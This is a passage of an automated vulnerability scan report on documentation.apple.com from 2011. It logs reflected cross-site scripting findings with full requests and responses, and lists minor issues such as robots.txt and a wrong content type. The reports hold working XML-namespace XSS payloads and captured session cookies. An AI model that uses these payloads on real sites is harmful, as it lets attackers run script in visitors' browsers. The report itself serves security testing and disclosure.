The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationNameebced<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8651bd2c284&q=xss HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:21:00 GMT
Date: Fri, 15 Jul 2011 20:11:00 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.036331"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend
...[SNIP]...
ang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationNameebced<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8651bd2c284","name":"getfields","original_value":"bookName.pageName.ApplicationNameebced%3Ca+xmlns%3Aa%3D'http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml'%3E%3Ca%3Abody+onload%3D'alert(1)'%2F%3E%3C%2Fa%3E8651bd2c284"},{"v
...[SNIP]...
3.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The value of the q request parameter is copied into the XML document as plain text between tags. The payload 8d376<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>aa2eaeea1ca was submitted in the q parameter. This input was echoed as 8d376<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>aa2eaeea1ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss8d376<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>aa2eaeea1ca HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1637
Vary: Accept-Encoding
Cache-Control: max-age=541
Expires: Fri, 15 Jul 2011 20:20:07 GMT
Date: Fri, 15 Jul 2011 20:11:06 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"xss8d376&lt;a xmlns:a=&#39;http://www.w3.org/1999/xhtml&#39;&gt;&lt;a:body onload=&#39;alert(1)&#39;/&gt;&lt;/<b><i>aa</i></b>&gt;aa2eaeea1ca","q":"xss8d376<a x
...[SNIP]...
</aa>aa2eaeea1ca"}},"Q":{"$t":"xss8d376<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>aa2eaeea1ca"},"TM":{"$t":"0.027944"},"VER":"3.2","PARAM":[{"value":"xss8d376<a xmlns:a='http://www.w3.org/1999/xhtml'>
...[SNIP]...
4. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /en/finalcutserver_otherhelp/Final%20Cut%20Server%20Setup%20Guide%20(en).pdf

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /en/finalcutserver_otherhelp/Final%20Cut%20Server%20Setup%20Guide%20(en).pdf HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/en/finalcutserver/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 11 Jul 2011 23:24:23 GMT
ETag: "503721-36c672-4a7d37bc097c0"
Server: Apache/2.2.17 (Unix) PHP/5.3.4
Accept-Ranges: bytes
Content-Length: 3589746
Content-Type: application/apple-documentation-pdf
Cache-Control: max-age=799
Expires: Fri, 15 Jul 2011 20:23:53 GMT
Date: Fri, 15 Jul 2011 20:10:34 GMT
Connection: close

%PDF-1.4%....
2634 0 obj<</Linearized 1/L 3589746/O 2639/E 419297/N 125/T 3537022/H [ 2769 3234]>>endobj xref2634 1210000000016 00000 n
0000006225 00000 n
0000006526 00000 n
0000006590
...[SNIP]...
36 0 0 0 0 0 0 0 0 0 0 0 0 0 223 0 519 519 519 519 519 519 519 519 519 519 223 0 0 0 0 0 0 615 555 571 662 496 491 644 0 252 376 0 0 804 656 682 0 682 548 499 504 646 0 847 572 0 0 0 0 0 0 0 0 490 568 439 564 501 0 558 556 244 0 485 244 829 556 547 568 0 339 402 339 552 489 733 474 480]/BaseFont/EYJUEO+MyriadSet-Semibold/FirstChar 32/ToUnicode 472 0 R/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
or 468 0 R/LastChar 121/Widths[242 0 0 0 0 0 0 0 0 0 0 0 197 303 197 0 0 498 498 498 498 498 0 0 0 0 0 0 0 0 0 0 0 0 0 563 0 0 470 0 0 0 0 0 0 0 0 0 0 0 0 476 0 0 0 0 553 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 449 224 815 540 533 553 0 313 383 320 535 464 0 0 454]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
rueType/FontDescriptor 468 0 R/LastChar 118/Widths[242 0 0 0 0 0 0 0 0 0 0 0 0 0 197 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 476 0 0 0 0 0 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 0 224 0 540 533 0 0 313 383 320 0 464]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
riptor 468 0 R/LastChar 121/Widths[242 0 0 0 0 0 0 0 0 0 0 0 0 0 197 341 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 524 563 0 0 470 0 0 229 0 0 0 783 0 0 0 0 0 476 479 0 0 826 0 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 449 224 0 540 533 553 0 313 383 320 535 0 721 0 454]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
rueType/FontDescriptor 468 0 R/LastChar 146/Widths[242 0 0 0 0 0 0 0 0 0 0 0 0 0 197 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 563 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 0 224 815 540 533 0 0 313 383 320 535 0 721 0 454 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 196]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
rueType/FontDescriptor 468 0 R/LastChar 121/Widths[242 0 0 0 0 0 0 0 0 0 0 0 0 0 197 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 476 0 0 0 0 0 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 0 0 0 540 533 553 0 313 383 320 535 0 721 0 454]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
rueType/FontDescriptor 468 0 R/LastChar 121/Widths[242 0 0 0 0 0 0 0 0 0 0 0 0 0 197 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 476 0 0 0 0 0 0 0 0 0 0 0 0 0 467 0 437 547 487 280 544 540 224 0 0 224 815 540 533 553 0 313 383 320 535 0 721 0 454]/BaseFont/DQZOQQ+MyriadSet-Text/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
5. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /en/aperture/usermanual/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: documentation.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 11 Jul 2011 23:24:45 GMT
ETag: "44d893-102-4a7d37d104940"
Server: Apache/2.2.17 (Unix) PHP/5.3.4
ntCoent-Length: 258
Content-Type: text/plain
Cache-Control: max-age=153
Expires: Fri, 15 Jul 2011 20:12:23 GMT
Date: Fri, 15 Jul 2011 20:09:50 GMT
Content-Length: 258
Connection: close

# robots.txt for http://documentation.apple.com/
# See: http://www.robotstxt.org/
User-agent: *
Disallow: /AlertMessages/
Disallow: /Resources/
Disallow: /SharedResources/
Disallow: /search/

# For Go
...[SNIP]...
6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1109
Vary: Accept-Encoding
Cache-Control: max-age=575
Expires: Fri, 15 Jul 2011 20:20:29 GMT
Date: Fri, 15 Jul 2011 20:10:54 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.016109"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend
...[SNIP]...
Report generated by XSS.CX at Wed Jul 20 06:06:15 CDT 2011.